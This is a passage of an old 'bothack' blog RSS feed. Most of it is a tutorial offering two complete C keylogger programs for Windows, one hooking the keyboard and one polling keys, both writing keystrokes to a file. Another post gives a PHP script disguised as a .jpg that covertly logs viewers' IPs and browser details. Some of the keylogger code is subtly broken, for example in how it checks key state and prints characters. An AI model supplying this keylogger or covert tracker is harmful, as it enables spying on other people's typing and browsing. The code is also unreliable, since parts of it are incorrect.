<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/522/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/522/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/522/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/522/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/522/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=522&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/04/26/load-gmail-faster/feed/</wfw:commentRss>
		<slash:comments>46</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/52dc325df2627a80a5c5a0678f5b3e2e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">aswinanand</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2007/06/g1.thumbnail.jpg" medium="image">
			<media:title type="html">Gmail Loads Slowly</media:title>
		</media:content>
	</item>
		<item>
		<title>Record the IPs of everyone who view a .jpg on your site</title>
		<link>http://bothack.wordpress.com/2008/04/26/record-the-ips-of-everyone-who-views-a-jpg-on-your-site/</link>
		<comments>http://bothack.wordpress.com/2008/04/26/record-the-ips-of-everyone-who-views-a-jpg-on-your-site/#comments</comments>
		<pubDate>Sat, 26 Apr 2008 23:51:34 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">https://bothack.wordpress.com/2006/07/20/record-the-ips-of-everyone-who-views-a-jpg-on-your-site/</guid>
		<description><![CDATA[This script allows php code to be run every time a certain jpg is loaded. The script below would log the IP that loaded image, the date, referer, and useragent, but it could be edited to do loads of things. Strictly for educational purpose. Just create a directory, put this php code into a file [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=241&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>This script allows php code to be run every time a certain jpg is loaded. The script below would log the IP that loaded image, the date, referer, and useragent, but it could be edited to do loads of things. Strictly for educational purpose.</p>
<p>Just create a directory, put this php code into a file which is saved as a .jpg file. You need a real image, in my case called sig.jpg in the same directory, and a file called (in my case) siginfo22.txt &#8211; this must be chmod&#8217;d to 777. Obviously, file names etc can be different, but must also be changed in code below. Oh, and create a .htaccess, as shown at top of that code.</p>
<p>&#8212;&#8212;&#8212;-<br />
<strong>The Script</strong><br />
&#8212;&#8212;&#8212;-<br />
&lt;?php /*<br />
create a .htaccess file containing the following two lines:</p>
<p>Options All -Indexes<br />
ForceType application/x-httpd-php</p>
<p>the first one means if someone tries to view directory, they are not<br />
shown it, the second allows the script to work</p>
<p>*/<br />
header(&#8220;Content-type: image/jpeg&#8221;);<br />
$ip = getenv(&#8220;REMOTE_ADDR&#8221;);<br />
$date = date(&#8220;d&#8221;) . &#8221; &#8221; . date(&#8220;F&#8221;) .<br />
&#8221; &#8221; . date(&#8220;Y&#8221;);<br />
$ref = getenv(&#8216;HTTP_REFERER&#8217;);<br />
$ua = $_SERVER['HTTP_USER_AGENT'];<br />
$intofile = $ip . &#8221; || &#8221; . $date . &#8221; || &#8221; . $ref<br />
. &#8221; || &#8221; . $ua . &#8220;&lt;br /&gt;&#8221;;<br />
$hfile = fopen(&#8220;siginfo22.txt&#8221;, &#8220;a&#8221;);<br />
fwrite($hfile, $intofile);<br />
fclose($hfile);<br />
$BGImage = imagecreatefromjpeg(&#8220;sig.jpg&#8221;);<br />
imagejpeg($BGImage);<br />
imagedestroy($BGImage);<br />
?&gt;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/241/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/241/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/241/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/241/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/241/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=241&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/04/26/record-the-ips-of-everyone-who-views-a-jpg-on-your-site/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>Microcontroller final year projects by Cornell University Students</title>
		<link>http://bothack.wordpress.com/2008/03/14/microcontroller-final-year-projects-by-cornell-university-students/</link>
		<comments>http://bothack.wordpress.com/2008/03/14/microcontroller-final-year-projects-by-cornell-university-students/#comments</comments>
		<pubDate>Fri, 14 Mar 2008 05:45:55 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[colleges]]></category>
		<category><![CDATA[Extras]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Techies]]></category>
		<category><![CDATA[Cornell]]></category>
		<category><![CDATA[design]]></category>
		<category><![CDATA[education]]></category>
		<category><![CDATA[final year]]></category>
		<category><![CDATA[microcontrollers]]></category>
		<category><![CDATA[projects]]></category>
		<category><![CDATA[University]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2008/03/14/microcontroller-final-year-projects-by-cornell-university-students/</guid>
		<description><![CDATA[Students at Cornell University were given the responsibility of choosing, designing and building a microcontroller project,. This year&#8217;s projects include laser pong, air guitar, an evolving neural robot, and a USB host controller. http://instruct1.cit.cornell.edu/courses/ee476/FinalProjects/ During the last 5 weeks of the semester in ECE476, Microcontroller Design, students have to combine sensors, actuators, microcontrollers, and mathematical [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=550&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Students at Cornell University were given the responsibility of choosing, designing and building a microcontroller project,. This year&#8217;s projects include laser pong, air guitar, an evolving neural robot, and a USB host controller.</p>
<p><a href="http://instruct1.cit.cornell.edu/courses/ee476/FinalProjects/" target="_blank">http://instruct1.cit.cornell.edu/courses/ee476/FinalProjects/</a></p>
<p>During the last 5 weeks of the semester in ECE476, Microcontroller Design, students have to combine sensors, actuators, microcontrollers, and mathematical techniques to build something.</p>
<p>Some projects are infrsstructure, such as an 8-bit color display for video games or a voice recognition scheme. Many groups built some kind of robot or musical device. All projects show a great deal of originality and work. There are over 200 projects on the page.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/550/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/550/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/550/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/550/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/550/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=550&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/03/14/microcontroller-final-year-projects-by-cornell-university-students/feed/</wfw:commentRss>
		<slash:comments>130</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>Google Search/Label Hack</title>
		<link>http://bothack.wordpress.com/2008/02/14/google-searchlabel-hack/</link>
		<comments>http://bothack.wordpress.com/2008/02/14/google-searchlabel-hack/#comments</comments>
		<pubDate>Thu, 14 Feb 2008 17:59:35 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Entertainment]]></category>
		<category><![CDATA[Extras]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/10/01/google-searchlabel-hack/</guid>
		<description><![CDATA[The image you see above is not photoshoped. Follow this link to verify. Using the special characters, number of such words can be formed. The URL looks something like: http://www.google.com/search?hl=en&#038;lr=&#038;safe=off&#038;q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80&#038;btnG=Search A close look at the searh term, you will notice terms like &#8220;%E2%96%84&#8243; The last number of the three component term, decides the position of [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=342&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><a class="imagelink" title="google hack" href="http://bothack.files.wordpress.com/2006/10/googlehack.jpg"><img src="http://bothack.files.wordpress.com/2006/10/googlehack.jpg?w=500" alt="google hack" /></a></p>
<p>The image you see above is not photoshoped. <strong>Follow <a href="http://www.google.com/search?hl=en&amp;lr=&amp;safe=off&amp;q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80&amp;btnG=Search" target="_blank">this link</a> to verify</strong>. Using the special characters, number of such words can be formed.</p>
<p><strong>The URL looks something like:</strong></p>
<p>http://www.google.com/search?hl=en&#038;lr=&#038;safe=off&#038;q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80&#038;btnG=Search</p>
<p>A close look at the searh term, you will notice terms like <strong>&#8220;%E2%96%84&#8243;</strong></p>
<p>The last number of the three component term, decides the position of the blocks.</p>
<p><strong>%E2%96%84</strong>- bottom horizontal dash<br />
<strong><br />
%E2%96%88</strong> &#8211; straight line</p>
<p><strong>%E2%96%80</strong> &#8211; upper horizontal bar</p>
<p><strong>%E2%96%AC</strong> &#8211; middle bar</p>
<p><strong>%E2%96%BC</strong> &#8211; Down arrow</p>
<p>Many other such symbols are possible. You can always do the trial and error to find them. But with the above 5 codes, you can symbolize:<strong> H, I, J, L, M, S, T, U, W and Z</strong><strong>.</strong></p>
<p>A combination of %E2%96%84,%E2%96%84,%E2%96%88,%E2%96%80,%E2%96%80 will give you the letter S. To separate letters, use the &#8216;+&#8217; operator in the search term feild.</p>
<p>Where can you use this. As of now, this doesn&#8217;t make sense. But this can also be made use of to label your google videos/photos etc. This will help capture attention <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a class="imagelink" title="google video/label hack" href="http://bothack.files.wordpress.com/2006/10/googlevideohack.jpg"><img src="http://bothack.files.wordpress.com/2006/10/googlevideohack.jpg?w=500" alt="google video/label hack" /></a></p>
<p><a href="http://www.google.com/search?hl=en&amp;lr=&amp;safe=off&amp;q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80&amp;btnG=Search" target="_blank">Demo</a></p>
<hr /><strong>Hack the Bot:</strong> <a rel="tag" href="/index.php?s=google">google</a>, <a rel="tag" href="/index.php?s=google+hacks">google+hacks</a>, <a rel="tag" href="/index.php?s=hacks">hacks</a>, <a rel="tag" href="/index.php?s=entertainment">entertainment</a>, <a rel="tag" href="/index.php?s=fun">fun</a>, <a rel="tag" href="/index.php?s=bug">bug</a>, <a rel="tag" href="/index.php?s=search">search</a>, <a rel="tag" href="/index.php?s=tag">tag</a>, <a rel="tag" href="/index.php?s=categories">categories</a>, <a rel="tag" href="/index.php?s=tips">tips</a><br />
<a title="BotHackr" href="http://bothackr.blogspot.com"></a></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/342/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/342/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/342/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/342/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/342/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=342&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2008/02/14/google-searchlabel-hack/feed/</wfw:commentRss>
		<slash:comments>13</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2006/10/googlehack.jpg" medium="image">
			<media:title type="html">google hack</media:title>
		</media:content>

		<media:content url="http://bothack.files.wordpress.com/2006/10/googlevideohack.jpg" medium="image">
			<media:title type="html">google video/label hack</media:title>
		</media:content>
	</item>
		<item>
		<title>Keylogging fun for C/C++ Beginners</title>
		<link>http://bothack.wordpress.com/2007/12/12/keylogging-fun-for-cc-beginners/</link>
		<comments>http://bothack.wordpress.com/2007/12/12/keylogging-fun-for-cc-beginners/#comments</comments>
		<pubDate>Wed, 12 Dec 2007 16:06:06 +0000</pubDate>
		<dc:creator>appkumar</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[How-To]]></category>
		<category><![CDATA[Techies]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2007/12/12/keylogging-fun-for-cc-beginners/</guid>
		<description><![CDATA[The examples below are for beginners in C/C++ with some basic knowledge of the windows &#8211; API. 1. Global hook Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=430&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The examples below are for beginners in C/C++ with some basic knowledge of the windows &#8211; API.</p>
<p><strong>1. Global hook</strong></p>
<p><strong><em> Hook:</em> </strong>A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.</p>
<p><em><strong>Available hooks:</strong></em></p>
<p>WH_CALLWNDPROC<br />
WH_CALLWNDPROCRET<br />
WH_CBT<br />
WH_DEBUG<br />
WH_FOREGROUNDIDLE<br />
WH_GETMESSAGE<br />
WH_JOURNALPLAYBACK<br />
WH_JOURNALRECORD<br />
WH_KEYBOARD<br />
WH_KEYBOARD_LL<br />
WH_MOUSE<br />
WH_MOUSE_LL<br />
WH_MSGFILTER<br />
WH_SHELL<br />
WH_SYSMSGFILTER</p>
<p><em><strong>To install a hook you call this API-function:</strong></em></p>
<p><code>HHOOK SetWindowsHookEx(<br />
int idHook,        // type of hook to install<br />
HOOKPROC lpfn,     // address of hook procedure<br />
HINSTANCE hMod,    // handle to application instance<br />
DWORD dwThreadId   // identity of thread to install hook for<br />
);</code></p>
<p><em>- idhook</em></p>
<p>Specifies the type of hook procedure to be installed. We choose &#8220;WH_KEYBOARD_LL&#8221; (13).</p>
<p><em>- lpfn</em></p>
<p>The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was &#8220;injected&#8221;.<br />
<span id="more-430"></span><br />
The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.</p>
<p><code>LRESULT CALLBACK LowLevelKeyboardProc(<br />
int nCode,     // hook code<br />
WPARAM wParam, // message identifier<br />
LPARAM lParam  // pointer to structure with message data<br />
);</code></p>
<p><em>- hMod</em></p>
<p>In this case, our instance handle.</p>
<p><em>- dwThreadId</em></p>
<p>Specifies the identifier of the thread with which the hook procedure is to be associated.<br />
If this parameter is zero, the hook procedure is associated with all existing threads.</p>
<p>Now we know enough to create our first keylogger, using a global keyboard hook:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><code><br />
#include &lt;stdio.h&gt;<br />
#include &lt;windows.h&gt;<br />
#define FILENAME "keylog.txt"</code></p>
<p><code>void CheckKey(int key);</code></p>
<p><code>LRESULT CALLBACK KeyboardHook(<br />
int nCode,     // hook code<br />
WPARAM wParam, // message identifier<br />
LPARAM lParam  // pointer to structure with message data<br />
);</code></p>
<p><code>typedef struct tagKBDLLHOOKSTRUCT {<br />
DWORD vkCode;      // virtual key code<br />
DWORD scanCode;    // scan code<br />
DWORD flags;       // flags<br />
DWORD time;        // time stamp for this message<br />
DWORD dwExtraInfo; // extra info from the driver or keybd_event<br />
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;<br />
</code><br />
<code>HHOOK hHook;</code></p>
<p><code>int APIENTRY WinMain(HINSTANCE hInstance,<br />
HINSTANCE hPrevInstance,<br />
LPSTR     lpCmdLine,<br />
int       nCmdShow )<br />
{</code><br />
<code>hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);<br />
while (GetMessage(NULL,NULL,0,0)) ;	// NOP while not WM_QUIT<br />
return UnhookWindowsHookEx(hHook);<br />
}</code></p>
<p><code>LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )<br />
{<br />
if (nCode == HC_ACTION)<br />
if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)<br />
CheckKey (((PKBDLLHOOKSTRUCT)lParam)-&gt;vkCode);<br />
return CallNextHookEx(hHook, nCode, wParam, lParam);<br />
}</code></p>
<p><code>void CheckKey(int key)<br />
{<br />
FILE *pfile = fopen(FILENAME,"a+");<br />
// translate virtual key code to ascii<br />
// and write it to file..<br />
fclose(pfile);<br />
}</code></p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>2.</p>
<p>GetAsyncKeyState()</p>
<p>The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.</p>
<p>SHORT GetAsyncKeyState(<br />
int vKey   // virtual-key code<br />
);</p>
<p>- vKey</p>
<p>Specifies one of 256 possible virtual-key codes.</p>
<p>This is our second keylogger, now using GetAsyncKeyState() :</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><code>#include &lt;stdio.h&gt;<br />
#include &lt;windows.h&gt;</code></p>
<p><code>#define FILENAME "keylog.txt"</code></p>
<p><code>void CheckKey(int key);</code></p>
<p><code>void main()<br />
{<br />
while(1)<br />
{<br />
Sleep(10);	// avoid 100% cpu usage</code></p>
<p><code>for(int key=8; key&lt;=190; key++)<br />
if (GetAsyncKeyState(key) == HC_ACTION)<br />
CheckKey(key);<br />
}<br />
}</code></p>
<p><code>void CheckKey(int key)<br />
{<br />
// ...<br />
}</code></p>
<p>==========================================================================================================================</p>
<p><strong>The CheckKey() function may look like :</strong></p>
<p><code><br />
void CheckKey(int key)<br />
{<br />
FILE *pfile = fopen(FILENAME,"a+");</code></p>
<p><code>if (key==8)<br />
fprintf(pfile,"%s","[del]");<br />
if (key==13)<br />
fprintf(pfile,"%s","\n");<br />
if (key==32)<br />
fprintf(pfile,"%s"," ");<br />
if (key==VK_CAPITAL)<br />
fprintf(pfile,"%s","[CAPS]");<br />
if (key==VK_TAB)<br />
fprintf(pfile,"%s","[TAB]");<br />
if (key==VK_SHIFT)<br />
fprintf(pfile,"%s","[SHIFT]");<br />
if (key==VK_CONTROL)<br />
fprintf(pfile,"%s","[CTRL]");<br />
if (key==VK_PAUSE)<br />
fprintf(pfile,"%s","[PAUSE]");<br />
if (key==VK_ESCAPE)<br />
fprintf(pfile,"%s","[ESC]");<br />
if (key==VK_END)<br />
fprintf(pfile,"%s","[END]");<br />
if (key==VK_HOME)<br />
fprintf(pfile,"%s","[HOME]");<br />
if (key==VK_LEFT)<br />
fprintf(pfile,"%s","[LEFT]");<br />
if (key==VK_UP)<br />
fprintf(pfile,"%s","[UP]");<br />
if (key==VK_RIGHT)<br />
fprintf(pfile,"%s","[RIGHT]");<br />
if (key==VK_DOWN)<br />
fprintf(pfile,"%s","[DOWN]");<br />
if (key==VK_SNAPSHOT)<br />
fprintf(pfile,"%s","[PRINT]");<br />
if (key==VK_NUMLOCK)<br />
fprintf(pfile,"%s","[NUM LOCK]");<br />
if (key==190 || key==110)<br />
fprintf(pfile,"%s",".");<br />
</code><br />
<code>if (key &gt;=96 &amp;&amp; key &lt;= 105)<br />
{<br />
key -= 48;<br />
fprintf(pfile,"%s",&amp;key);<br />
}</code></p>
<p><code>if (key &gt;=48 &amp;&amp; key &lt;= 59)<br />
fprintf(pfile,"%s",&amp;key);</code></p>
<p><code>if (key !=VK_LBUTTON || key !=VK_RBUTTON)<br />
{<br />
if (key &gt;=65 &amp;&amp; key &lt;=90)<br />
{<br />
if (GetKeyState(VK_CAPITAL))<br />
fprintf(pfile,"%s",&amp;key);<br />
else<br />
{<br />
key = key +32;<br />
fprintf(pfile,"%s",&amp;key);<br />
</code><br />
<code>}<br />
}<br />
}</code></p>
<p><code>fclose(pfile);<br />
}</code><br />
The virtual key code table -&gt; google. Compiled with MS VC++ 6.0.</p>
<p>bugs:<br />
sure..	let me know.  <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/430/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/430/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/430/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/430/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/430/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=430&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/12/12/keylogging-fun-for-cc-beginners/feed/</wfw:commentRss>
		<slash:comments>24</slash:comments>
	
